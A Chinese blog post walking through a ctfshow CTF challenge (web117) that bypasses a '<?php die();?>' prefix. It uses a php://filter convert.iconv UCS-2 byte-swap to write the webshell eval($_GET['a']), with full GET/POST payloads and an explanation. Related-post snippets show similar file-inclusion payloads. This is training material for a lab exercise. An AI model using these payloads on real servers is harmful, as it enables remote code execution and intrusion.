ctfshow-web入门117(绕过exit头部限制)

最新推荐文章于 2024-05-06 11:30:35 发布
最新推荐文章于 2024-05-06 11:30:35 发布
阅读量1.6k 收藏 2
点赞数
分类专栏: # 各平台题目 文章标签: ctf ctfshow
https://blog.csdn.net/qq_44657899
本文链接:https://blog.csdn.net/qq_44657899/article/details/109319686
版权

源码如下:

 <?php

/*
# -*- coding: utf-8 -*-
# @Author: yu22x
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-10-01 18:16:59

*/
highlight_file(__FILE__);
error_reporting(0);
function filter($x){
    if(preg_match('/http|https|utf|zlib|data|input|rot13|base64|string|log|sess/i',$x)){
        die('too young too simple sometimes naive!');
    }
}
$file=$_GET['file'];
$contents=$_POST['contents'];
filter($file);
file_put_contents($file, "<?php die();?>".$contents);

这道题可以参考p牛的文章:谈一谈php://filter的妙用

方法和p牛的一样,只是这道题过滤了rot13,base64,string等一些过滤器的内容,那换其他过滤器不就完事了。php://filter的各种过滤器。这里我们用convert.iconv.*这个过滤器。

payload:

GET: ?file=php://filter/convert.iconv.ucs-2be.ucs-2le/resource=5.php

POST: contents=?<hp pvela$(G_TE'['a)] ;>?

在这里插入图片描述
我们看看这段代码为啥能绕过exit
在这里插入图片描述

<?php
highlight_file(__FILE__);
file_put_contents("php://filter/convert.iconv.ucs-2be.ucs-2le/resource=5.php"
, "<?php die();?>?<hp pvela$(G_TE'['a)] ;>?"); 
?>

再看看创建的5.php
在这里插入图片描述

?<hp pid(e;)>?<?php eval($_GET['a']); ?>

前面的die()被编码后不符合php格式,被当做字符串,而我们传的代码编码后正常了。

天问_Herbert555
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CTFshow 文件包含 web117
Kradress的博客
12-12 782
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: yu22x # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-10-01 18:16:59 */ highlight_file(__FILE__); error_reporting(0); function filter($x){ if(preg_ma
CTF题型 php://filter特殊编码绕过小汇总
qq_39947980的博客
03-28 795
php://filter是一个伪协议,它允许你读取经过过滤器处理的数据流。过滤器可以执行各种转换,如 base64 编码/解码、字符串压缩/解压缩等它的存在是数据流和控制流的“中间人”,有点类似我们抓包工具Burp的感觉,我们可以人为进行操控更改。
2024年最新CTF题型 php filter特殊编码绕过小汇总,2024年最新网络安全开发实战讲解
最新发布
2401_84301853的博客
05-06 957
这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
ctfshow_web入门_文件包含_web78~web117
qq_62989306的博客
09-13 755
文件包含之php://filter伪协议、data协议、包含日志文件、session.upload_progress利用、条件竞争、死亡绕过……
ctf.show文件包含(web78-web117)
wanan的博客
08-31 455
ctf.show文件包含(web78-web117)
ctfshow 文件包含 web 78 -117
shinygod的博客
02-27 1459
目录web 78web 79web 80web 81web 82 web 78 data://text/plain,<?php system("cat flag.php");?> php://filter/convert.base64-encode/resource=flag.php web 79 file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= //PD9waHAgc3lzdGVtKCdjYXQgZmx
ctfshow文件包含web87-117
m0_62207170的博客
06-19 454
ctfshow文件包含web87-117
exit-web-framework
12-16
exit-web-framework是对常用的java web开发封装实用功能来提高开发效率。exit-web-framework基于Spring 3、Hibernate4框架来对做项目核心三层和MVC的管理。使用到的新功能有spring缓存工厂、apeche shiro安全框架、...
exit-this windows.rar_EXIT
09-24
【标题】"exit-this windows.rar_EXIT" 涉及到的知识点主要是在Windows操作系统中如何实现程序化的关机操作。这个压缩包似乎包含了一个专门设计用于关闭计算机的程序,名为"exitWin"。在Windows环境下,开发这样的...
node-http-tunnel:用于绕过限制性防火墙的 HTTP 隧道
07-13
# On server outside the firewall ./server & disown exit On your machine inside the firewall ./client # This sets up a SOCKS5 server on your local machine Use with SSH ssh -o ProxyCommand "./ssh-...
exit-Introduction.rar_EXIT
09-19
在计算机编程领域,"exit" 是一个非常基础且重要的概念,尤其在命令行接口和脚本编程中。本文将深入探讨 "exit" 的使用方法及其功能,帮助初学者更好地理解和运用这一工具。 "exit" 命令主要用于程序或脚本的退出...
Linux运维-3.Shell编程-12 shell编程-150exit语句.avi
11-01
Linux运维-3.Shell编程-12 shell编程-150exit语句.avi
ctfshow web入门 文件包含:web78-web81 web88 web116 web117
rawrecruit的博客
04-14 7203
个人ctfshow刷题记录
CTFshow_Web_文件包含——web78~88、116~117
Ho1aAs‘s Blog
04-26 1036
文章目录题解web78web79web80~81web82~86web87web88web116web117完 题解 LFI:Local File Include RFI:Remote File Include web78 php伪协议,使用php://filter,解码即可 [GET]PAYLOAD: ?file=php://filter/convert.base64-encode/resource=flag.php web79 过滤php,data伪协议,使用php://data,上传php代码打开f
关于php的exit函数的绕过问题
https://www.cnblogs.com/zpchcbd/
04-01 2765
<?php show_source(__FILE__); $c="<?php exit;?>"; @$c.=$_POST['c']; @$filename=$_POST['file']; if(!isset($filename)) { ...
CTFshow 文件包含 78-88&116-117
Landasika的博客
05-17 1060
目录 web78web79web80方法一、http://远程包含方法二、include包含日志web81web82-86:条件竞争web87*web88web116web117 web78 if(isset($_GET['file'])){ $file=$_GET['file']; include($file); }else{ highlight_file...
php 死亡绕过
m0_75178803的博客
04-09 465
之类的限制) ,不管后面的语句是什么,都会先执行退出,导致后面的语句不执行,这也叫php死亡退出。base64编码中只包含64个可打印字符,而php在解码base64时,遇到不在其中的字符时,将会跳过这些字符,仅将合法字符组成一个新的字符串进行解码。运用到一个正则表达式,会把输入进行正则匹配,把内容里不符合条件的,比如说<?base64是四个字符一解密,前面的8个字符解密后会变成6个乱码,后面的正常解密,获得加密之前的语句。因为我们加入了一个a。
浅谈CTF中代码审计PHP死亡退出
m0re's blog
10-24 1710
前言:遇到一个代码审计的题目,略有思考。记录一下~ 源码就是这样的 <?php $content = '<?php exit; ?>'; $content .= $_POST['data']; file_put_contents($_POST['filename'], $content);
ctf题目php文件上传如何绕过_BUUCTF web 刷几道菜鸡能做的题
weixin_28862967的博客
01-14 966
[WUSTCTF2020]CV Maker(文件上传)1、注册,登录,上传图片马,用bp抓包后将filename后缀改为php,连上蚁剑。[极客大挑战 2019]Havefun(简单代码审计)[极客大挑战 2019]Knife1、直接连上蚁剑。果真白给的shell。[极客大挑战 2019]EasySQL(万能密码)username=‘admin‘or 1=1#‘ and password=‘随便写...
ctfshow web117
08-27
很抱歉,我无法回答关于ctfshow web117的问题。因为你提供的引用内容似乎与ctfshow web117无关。我建议你提供更详细的信息或正确的引用内容,以便我能够更好地帮助你。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [CTFshow 文件包含 web117](https://blog.csdn.net/Kracxi/article/details/121890781)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [ctfshow-web入门117(绕过exit头部限制)](https://blog.csdn.net/qq_44657899/article/details/109319686)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值